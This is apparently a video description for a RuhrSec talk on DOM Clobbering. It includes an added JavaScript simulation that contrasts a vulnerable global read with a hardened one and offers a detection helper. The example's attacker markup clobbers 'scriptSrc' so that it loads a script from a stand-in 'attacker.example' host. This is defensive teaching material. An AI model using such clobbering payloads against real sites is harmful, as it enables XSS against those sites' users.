RuhrSec is the annual English-speaking IT security conference with cutting-edge security talks by renowned experts. RuhrSec is organized by Hackmanit.
———
Talk // Everything You Wanted to Know About DOM Clobbering (But Were Afraid to Ask)
Abstract // XSS has been a major threat to web apps for the past 20 years, often achieved by script injection and mitigated by disallowing or controlling script execution. But what if attackers can obtain XSS with script-less markup? DOM Clobbering is a type of namespace collision attack that enables attackers to transform seemingly benign HTML markup into executable code by exploiting the unforeseen interactions between JS code and the runtime environment. Unfortunately, the attack techniques, browser behaviours, and code patterns that enable DOM Clobbering have not been studied yet, and in this work, we undertake that. Our study shows that DOM Clobbering vulnerabilities are ubiquitous, affecting 9.8% of the top 5K sites, and that existing defenses may not completely prevent them. This talk covers clobbering techniques, vulnerability detection, prevalence, indicators, and defense.
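To make the mechanism in the abstract concrete, here is an added example (not code from the talk or its authors) that models the browser behaviour DOM Clobbering relies on: elements with `id` or `name` attributes become named properties of `window`, and a `<form>` exposes its named children one level deeper, so `window.x.y` can be clobbered too. The DOM is simulated with a small parser, the element class is reduced to the one trait that matters (an anchor stringifies to its `href`), and the markup, URLs and the `scriptSrc` global are constructed for the illustration. Alongside the vulnerable read-with-fallback pattern it shows a hardened variant and a helper that reports which names in untrusted markup collide with globals a page reads.

```javascript
// Added example, not from the talk: a model of the named-property access that
// DOM Clobbering abuses, the vulnerable code pattern, and a hardened variant.
// The DOM is simulated only as far as the mechanism needs; all markup, URLs
// and global names below are constructed for the illustration.

// Simplified element: String(anchor) yields its href, as HTMLAnchorElement does.
class ClobberElement {
  constructor(tag, attrs) {
    this.tag = tag;
    this.attrs = attrs;
  }
  toString() {
    return this.attrs.href !== undefined
      ? this.attrs.href
      : `[object HTML${this.tag}Element]`;
  }
}

// Tokenise opening/closing tags and their double-quoted attributes (toy parser).
function parseMarkup(html) {
  const tokens = [];
  const tagRe = /<(\/?)(\w+)([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    const attrRe = /(\w+)="([^"]*)"/g;
    let a;
    while ((a = attrRe.exec(m[3])) !== null) attrs[a[1]] = a[2];
    tokens.push({ closing: m[1] === '/', tag: m[2].toLowerCase(), attrs });
  }
  return tokens;
}

// Build the view a script gets on `window`: an element's id (or name) becomes a
// property; inside <form id="x">, a child's name becomes window.x.<name>
// (modelled on the form element's named getter). Unnamed elements are ignored.
function buildWindowView(html) {
  const view = {};
  let openForm = null;
  for (const t of parseMarkup(html)) {
    if (t.closing) {
      if (t.tag === 'form') openForm = null;
      continue;
    }
    const el = new ClobberElement(t.tag, t.attrs);
    const key = t.attrs.id !== undefined ? t.attrs.id : t.attrs.name;
    if (t.tag === 'form') {
      if (key !== undefined) view[key] = el;
      openForm = el;
    } else if (key !== undefined) {
      if (openForm !== null) openForm[key] = el; // nested clobbering
      else view[key] = el;
    }
  }
  return view;
}

// Vulnerable pattern: an undeclared global is read with a fallback, assuming only
// the application ever sets `scriptSrc`. Attacker markup with id="scriptSrc"
// passes the truthiness check and stringifies to the attacker's href.
function vulnerableLoaderSrc(win) {
  const src = win.scriptSrc || 'https://cdn.example.com/app.js';
  return String(src); // the value that would be assigned to script.src
}

// Hardened: accept only a plain string (in a real page also reject
// `candidate instanceof HTMLElement`) and never trust an implicit global.
function hardenedLoaderSrc(win) {
  const candidate = win.scriptSrc;
  return typeof candidate === 'string' ? candidate : 'https://cdn.example.com/app.js';
}

// Review/detection indicator: which globals read by the page are shadowed by
// an element in the untrusted markup?
function findClobberingNames(html, globalsRead) {
  const view = buildWindowView(html);
  return globalsRead.filter((g) => view[g] instanceof ClobberElement);
}

// Constructed attacker-controlled markup, e.g. what an HTML sanitizer that keeps
// <a> and <form> with id/name attributes would let through.
const ATTACKER_MARKUP =
  '<a id="scriptSrc" href="https://attacker.example/x.js">x</a>' +
  '<form id="settings"><input name="debug" value="1"></form>';

function demoVulnerable() {
  return vulnerableLoaderSrc(buildWindowView(ATTACKER_MARKUP));
}
function demoHardened() {
  return hardenedLoaderSrc(buildWindowView(ATTACKER_MARKUP));
}
function demoNested() {
  // window.settings.debug is now the <input>, not an application setting
  return buildWindowView(ATTACKER_MARKUP).settings.debug instanceof ClobberElement;
}

console.log(demoVulnerable()); // https://attacker.example/x.js
console.log(demoHardened());   // https://cdn.example.com/app.js
console.log(findClobberingNames(ATTACKER_MARKUP, ['scriptSrc', 'settings', 'config']));
```

The practical takeaway mirrors the abstract's point about defenses: a sanitizer that strips `<script>` but leaves `id`/`name` attributes does not stop this, so code should declare every global it reads, type-check what it finds on `window`/`document`, and reviewers can grep for `window.x || default` style reads and compare those names against attributes allowed in user markup.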
———
Biography // Soheil Khodayari is a PhD candidate at CISPA, Germany, researching in the area of web security and privacy testing, and Internet measurements. Soheil has presented and published his work at top-tier security venues like IEEE S&P, NDSS, USENIX Security, Stanford SecLunch, and OWASP AppSec. He also serves on the AE PC of security conferences like USENIX and ACSAC. Among his contributions, Soheil proposed the first taxonomy and detection of XS-Leaks, one of the first studies of client-side CSRF, the state of SameSite adoption, and other client-side vulnerabilities.
Speaker // Soheil Khodayari
[ Link ]
➡️ Slides - Download
[ Link ]
———
👉 Subscribe to our channel:
[ Link ]
👉 Read more about interesting IT security topics on our blog:
[ Link ]
✍️ Want a deeper dive?
Training courses in Single Sign-On (SAML, OAuth and OpenID Connect), Secure Web Development, TLS and Web Services are available here:
[ Link ]
———
🌍 RuhrSec conference website: [ Link ]
🌍 Visit our website - Hackmanit: [ Link ]
🐦 Follow RuhrSec on Twitter: [ Link ]
🐦 Follow Hackmanit on Twitter: [ Link ]
✔ Follow RuhrSec on LinkedIn: [ Link ]
✔ Follow Hackmanit on LinkedIn: [ Link ]
Follow Hackmanit on XING: [ Link ]
———
Thanks for your attention and support. Stay secure. 🫶
#XSS #DOMClobbering #hacking #itsecurity #itsicherheit #cybersecurity